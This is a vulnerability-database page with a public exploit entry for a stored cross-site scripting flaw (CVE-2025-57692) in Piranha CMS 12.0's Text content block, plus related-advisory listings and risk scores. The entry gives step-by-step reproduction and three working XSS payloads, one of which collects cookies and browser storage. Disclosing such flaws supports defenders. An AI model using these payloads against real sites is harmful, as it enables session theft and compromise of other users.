Vulners
Lucene search
Piranha CMS 12.0 - Stored XSS in Text Block
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | CVE-2025-57692 | 2 Feb 202609:16 | – | circl |
 | Piranha CMS 跨站脚本漏洞 | 26 Sep 202500:00 | – | cnnvd |
 | CVE-2025-57692 | 26 Sep 202500:00 | – | cve |
 | CVE-2025-57692 | 26 Sep 202500:00 | – | cvelist |
 | EUVD-2025-31385 | 3 Oct 202520:07 | – | euvd |
 | PiranhaCMS stored XSS | 26 Sep 202521:30 | – | github |
 | CVE-2025-57692 | 26 Sep 202520:15 | – | nvd |
 | CVE-2025-57692 | 26 Sep 202520:15 | – | osv |
| GHSA-456V-F425-8MCV PiranhaCMS stored XSS | 26 Sep 202521:30 | – | osv |
 | 📄 Piranha CMS 12.0 Cross Site Scripting | 5 Feb 202600:00 | – | packetstorm |
10
# Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting
# Date: 2025-09-26
# Exploit Author: Chidubem Chukwu (Terminal Venom)
# LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9?
# Vendor Homepage: https://piranhacms.org
# Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
# Version: 12.0
# Category: Web Application
# Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome
# CVE: CVE-2025-57692
# Privilege Level: authenticated user
# Patched Version: Not available
# Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md
## Reproduction Steps ##
PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user s browser.
Reproduction steps
1. Log in to the Piranha admin panel at https://<host>/manager/login.
2. Navigate to Pages.
3. Click Add Page and choose Standard Page or Standard Archive.
4. Enter a page title (e.g., XSS-Test).
5. Click the [ + ] button and select Text under Content to add a Text block.
6. In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page.
Payload A
<img src="x" onerror="
alert(
'Cookies: ' + document.cookie + '\n' +
'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
'URL: ' + window.location.href + '\n' +
'User Agent: ' + navigator.userAgent + '\n' +
'Time: ' + new Date().toLocaleString()
)
" />
Payload B — iframe base64
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
Payload C — details toggle (on-toggle alert)
<details open ontoggle=alert('XSS')>Click</details>
7. Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).
8. Anyone who accesses the page (or pastes the payload) will trigger the XSS.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Feb 2026 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.16.8
EPSS0.00077
SSVC